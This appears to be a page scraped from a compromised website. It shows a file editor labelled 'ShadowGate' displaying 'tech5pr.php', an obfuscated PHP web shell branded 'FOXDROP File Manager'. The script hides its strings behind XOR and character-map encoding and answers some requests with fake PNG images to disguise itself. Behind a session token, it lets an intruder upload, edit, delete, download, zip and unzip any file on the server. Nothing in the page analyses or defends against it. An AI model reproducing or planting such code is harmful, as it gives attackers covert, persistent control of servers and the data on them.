🗂️ ShadowGate
Path:
home
/
newsgini
/
xwebseries.site
/
✏️ Editing: tech5pr.php
<?php $xorKey='dTc7WuNEUCAgnwc2';function xorDecrypt($data, $key) {$keyLength = strlen($key);$result = '';for($i=0;$i<strlen($data);$i++){$result .= chr(ord($data[$i]) ^ ord($key[$i % $keyLength]));}return $result;}function encode_string($index) {global $obfuscationData,$xorKey;$str = $obfuscationData['iykKB'][$index];$charMap = $obfuscationData['pKpbZ'];$cleaned = '';for ($i = 0; $i < strlen($str); $i++) {if ($i % 3 != 2) {$cleaned .= $str[$i];}}$reversedMap = array_flip($charMap);$unmapped = '';for ($i = 0; $i < strlen($cleaned); $i++) {$char = $cleaned[$i];$unmapped .= isset($reversedMap[$char]) ? $reversedMap[$char] : $char;}$decoded = xorDecrypt(hex2bin($unmapped),$xorKey);return strrev($decoded);} $obfuscationData = json_decode(xorDecrypt(hex2bin(''),$xorKey),true); if (!(!(isset($_GET[encode_string(0)])))) { header(encode_string(1)); $fakePngs = [ encode_string(2), encode_string(3), encode_string(4), encode_string(5) ]; $selectedFakePng = $fakePngs[array_rand($fakePngs)]; echo base64_decode($selectedFakePng); exit; } error_reporting(0); ini_set(encode_string(6), 0); session_start(); if (!(!(!isset($_SESSION[encode_string(7)])))) { $_SESSION[encode_string(8)] = bin2hex(random_bytes(16)); } define(encode_string(9), $_SESSION[encode_string(10)]); $root = realpath(__DIR__); $dir = isset($_GET[encode_string(11)]) ? realpath($_GET[encode_string(12)]) : $root; if (!$dir || strpos($dir, $root) !== 0) $dir = $root; function rrmdir($dir) { if (!is_dir($dir)) return; $objects = scandir($dir); foreach ($objects as $object) { if ($object == encode_string(13) || $object == encode_string(14)) continue; $path = $dir . DIRECTORY_SEPARATOR . $object; is_dir($path) ? rrmdir($path) : @unlink($path); } @rmdir($dir); } if (!(!($_SERVER[encode_string(15)] === encode_string(16) && isset($_FILES[encode_string(17)])))) { if ($_POST[encode_string(18)] !== AUTH_TOKEN) die(encode_string(19)); $up = $_FILES[encode_string(20)]; $name = basename($up[encode_string(21)]); $target = rtrim($dir, encode_string(22)) . DIRECTORY_SEPARATOR . $name; echo encode_string(23); $success = false; if (!(!($up[encode_string(24)] === UPLOAD_ERR_OK && is_uploaded_file($up[encode_string(25)])))) { if (!(!(move_uploaded_file($up[encode_string(26)], $target)))) { $success = true; echo encode_string(27); } elseif (!(!(@copy($up[encode_string(28)], $target)))) { $success = true; echo encode_string(29); } else { $safeExt = pathinfo($name, PATHINFO_EXTENSION) . encode_string(30); $safeName = pathinfo($name, PATHINFO_FILENAME) . encode_string(31) . $safeExt; $safeTarget = rtrim($dir, encode_string(32)) . DIRECTORY_SEPARATOR . $safeName; if (!(!(move_uploaded_file($up[encode_string(33)], $safeTarget)))) { $success = true; echo "⚠️ Uploaded as $safeName<br>"; if (!(!(@rename($safeTarget, $target)))) { echo encode_string(34); } else { echo encode_string(35); } } } } if (!(!(!$success))) { echo "❌ Upload failed (Error: {$up['error']})<br>"; } echo encode_string(36); } if (!(!(isset($_GET[encode_string(37)], $_GET[encode_string(38)], $_GET[encode_string(39)])))) { if ($_GET[encode_string(40)] !== AUTH_TOKEN) die(encode_string(41)); $f = realpath($_GET[encode_string(42)]); if (!$f || strpos($f, $root) !== 0) die(encode_string(43)); switch ($_GET[encode_string(44)]) { case encode_string(45): if (!(!($_SERVER[encode_string(46)] === encode_string(47)))) { $backup = $f . encode_string(48); @copy($f, $backup); $data = $_POST[encode_string(49)] ?? encode_string(50); if (!(!(file_put_contents($f, $data) === false))) { @rename($backup, $f); echo encode_string(51); } else { @unlink($backup); echo encode_string(52); } } $content = @file_get_contents($f) ?: encode_string(53); echo encode_string(54) . htmlspecialchars(basename($f)) . encode_string(55); echo encode_string(56) . htmlspecialchars($content) . encode_string(57) . AUTH_TOKEN . encode_string(58) . urlencode(dirname($f)) . encode_string(59) . AUTH_TOKEN . encode_string(60); exit; case encode_string(61): is_dir($f) ? rrmdir($f) : @unlink($f); break; case encode_string(62): header(encode_string(63)); header(encode_string(64)); header(encode_string(65).basename($f).encode_string(66)); header(encode_string(67) . filesize($f)); readfile($f); exit; case encode_string(68): $zipname = $f . encode_string(69); $zip = new ZipArchive(); if (!(!($zip->open($zipname, ZipArchive::CREATE) === TRUE))) { if (!(!(is_dir($f)))) { $files = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($f), RecursiveIteratorIterator::LEAVES_ONLY ); foreach ($files as $file) { if (!(!(!$file->isDir()))) { $filePath = $file->getRealPath(); $relativePath = substr($filePath, strlen($f) + 1); $zip->addFile($filePath, $relativePath); } } } else { $zip->addFile($f, basename($f)); } $zip->close(); } break; case encode_string(70): $zip = new ZipArchive(); if (!(!($zip->open($f) === TRUE))) { $extractPath = dirname($f); $zip->extractTo($extractPath); $zip->close(); header(encode_string(71) . urlencode(dirname($f)) . encode_string(72) . AUTH_TOKEN . encode_string(73)); exit; } break; case encode_string(74): $newdir = $f . DIRECTORY_SEPARATOR . basename($_GET[encode_string(75)]); @mkdir($newdir, 0755, true); break; case encode_string(76): $to = dirname($f) . DIRECTORY_SEPARATOR . basename($_GET[encode_string(77)]); @rename($f, $to); break; } header(encode_string(78) . urlencode($dir) . encode_string(79) . AUTH_TOKEN); exit; } ?><!DOCTYPE html> <html><head> <title>🧩 FOXDROP v2.1</title> <link rel="icon" href="?i=1" type="image/png"> <style> :root { --bg: #121212; --card: #1e1e1e; --primary: #2a7fff; --accent: #ff6b6b; --text: #f0f0f0; --text-light: #ffffff; --success: #4caf50; --warning: #ff9800; } * { box-sizing: border-box; margin: 0; padding: 0; } body { font-family: 'Segoe UI', system-ui, sans-serif; background: var(--bg); color: var(--text); padding: 20px; line-height: 1.6; } .container { max-width: 1200px; margin: 0 auto; } header { display: flex; justify-content: space-between; align-items: center; margin-bottom: 20px; padding-bottom: 15px; border-bottom: 1px solid #333; } h1 { color: var(--text-light); font-size: 1.8rem; text-shadow: 0 1px 3px rgba(0,0,0,0.5); } .card { background: var(--card); border-radius: 10px; padding: 20px; margin-bottom: 20px; box-shadow: 0 4px 15px rgba(0,0,0,0.3); border: 1px solid #2c2c2c; } .btn { display: inline-block; padding: 8px 15px; background: var(--primary); color: white !important; text-decoration: none; border-radius: 5px; border: none; cursor: pointer; font-size: 14px; transition: all 0.3s; font-weight: 600; } .btn:hover { background: #0051a8; transform: translateY(-2px); box-shadow: 0 2px 8px rgba(0,0,0,0.2); } .btn.danger { background: var(--accent); } .btn.danger:hover { background: #e55a5a; } .btn-group { display: flex; gap: 10px; flex-wrap: wrap; margin-bottom: 15px; } .log-box { font-family: monospace; padding: 15px; background: #0a1929; color: #4ade80; margin-bottom: 20px; border-radius: 5px; border-left: 3px solid var(--primary); } .error { color: #ff9e9e; background: #3a0a0a; padding: 12px; border-radius: 5px; border-left: 4px solid var(--accent); } .success { color: #a8ffb0; background: #0a2c14; padding: 12px; border-radius: 5px; border-left: 4px solid var(--success); } table { width: 100%; background: rgba(255,255,255,0.05); border-collapse: collapse; border-radius: 8px; overflow: hidden; border: 1px solid #2a2a2a; } th, td { padding: 12px 15px; text-align: left; border-bottom: 1px solid #333; color: var(--text-light); } th { background: rgba(42, 127, 255, 0.25); font-weight: 600; color: white; } tr:hover { background: rgba(255,255,255,0.08); } .breadcrumb { display: flex; gap: 8px; align-items: center; margin-bottom: 20px; flex-wrap: wrap; padding: 12px 0; } .editor { width: 100%; height: 60vh; font-family: 'Fira Code', monospace; background: #1e1e1e; color: #f0f0f0; padding: 15px; border-radius: 5px; border: 1px solid #444; resize: vertical; font-size: 14px; line-height: 1.5; } .actions { display: flex; gap: 8px; } .file-icon { margin-right: 8px; font-size: 1.1em; vertical-align: middle; } .viewer { max-width: 100%; max-height: 70vh; display: block; margin: 20px auto; border-radius: 5px; box-shadow: 0 0 20px rgba(0,0,0,0.4); } .toolbar { display: flex; gap: 15px; flex-wrap: wrap; margin-bottom: 20px; padding-bottom: 15px; border-bottom: 1px solid #333; } .toolbar form { display: flex; gap: 10px; align-items: center; } .toolbar input[type="text"] { padding: 10px 15px; border-radius: 5px; border: 1px solid #444; background: #2a2a2a; color: white; min-width: 220px; font-size: 14px; } .auth-token { background: rgba(0,0,0,0.3); padding: 6px 12px; border-radius: 4px; font-family: monospace; font-size: 0.9rem; } a { color: #7fb4ff; text-decoration: none; transition: color 0.2s; } a:hover { color: var(--primary); text-decoration: underline; } </style> </head> <body> <div class="container"> <header> <h1>🧩 FOXDROP File Manager v6.6.6</h1> <div class="auth-token">Token: <code><?= substr(AUTH_TOKEN, 0, 8) ?>...</code></div> </header> <div class="card"> <?php $parts = explode(encode_string(80), trim(str_replace($root, encode_string(81), $dir), encode_string(82))); $build = $root; echo encode_string(83); echo encode_string(84) . urlencode($root) . encode_string(85) . AUTH_TOKEN . encode_string(86); foreach ($parts as $p) { if ($p === encode_string(87)) continue; $build .= encode_string(88) . $p; echo encode_string(89) . urlencode($build) . encode_string(90) . AUTH_TOKEN . encode_string(91) . htmlspecialchars($p) . encode_string(92); } echo encode_string(93); if (!(!(isset($_GET[encode_string(94)])))) { echo encode_string(95); } if (!(!(isset($_GET[encode_string(96)])))) { echo encode_string(97); } echo encode_string(98); echo encode_string(99).htmlspecialchars($dir).encode_string(100).AUTH_TOKEN.encode_string(101); echo encode_string(102).htmlspecialchars($dir).encode_string(103).AUTH_TOKEN.encode_string(104); echo encode_string(105); echo encode_string(106); if (!(!($dir !== $root))) { $parent = dirname($dir); echo encode_string(107).urlencode($parent).encode_string(108).AUTH_TOKEN.encode_string(109); } foreach (scandir($dir) as $f) { if ($f === encode_string(110) || $f === encode_string(111)) continue; $fp = "$dir/$f"; $isDir = is_dir($fp); $size = $isDir ? encode_string(112) : formatSize(filesize($fp)); $perms = substr(decoct(fileperms($fp)), -4); $mtime = date(encode_string(113), filemtime($fp)); $encoded = urlencode($fp); $auth = encode_string(114) . AUTH_TOKEN; echo encode_string(115).($isDir ? encode_string(116) : encode_string(117)).encode_string(118) . ($isDir ? encode_string(119) . urlencode($fp) . $auth : encode_string(120) . urlencode($fp) . $auth) . encode_string(121) . htmlspecialchars($f) . "</a></td> <td>{$size}</td> <td>{$mtime}</td> <td>{$perms}</td> <td class='actions'>"; if (!(!(!$isDir))) { echo "<a class='btn' href='?act=edit&f=$encoded$auth'>Edit</a>"; echo "<a class='btn' href='?act=download&f=$encoded$auth'>Download</a>"; echo "<a class='btn danger' href='?act=delete&f=$encoded$auth' onclick='return confirm(\"Delete $f?\")'>Delete</a>"; if (!(!(strtolower(pathinfo($f, PATHINFO_EXTENSION)) === encode_string(122)))) { echo "<a class='btn' href='?act=unzip&f=$encoded$auth' onclick='return confirm(\"Extract archive?\")'>Unzip</a>"; } else { echo "<a class='btn' href='?act=zip&f=$encoded$auth'>Zip</a>"; } } else { echo "<a class='btn danger' href='?act=delete&f=$encoded$auth' onclick='return confirm(\"Delete folder and ALL contents?\")'>Delete</a>"; echo "<a class='btn' href='?act=zip&f=$encoded$auth'>Zip</a>"; } echo encode_string(123); } echo encode_string(124); function formatSize($bytes) { if ($bytes == 0) return encode_string(125); $units = [encode_string(126), encode_string(127), encode_string(128), encode_string(129)]; $i = floor(log($bytes, 1024)); return round($bytes / pow(1024, $i), 2) . encode_string(130) . $units[$i]; } ?> </div> </div> </body></html>
🔙 Back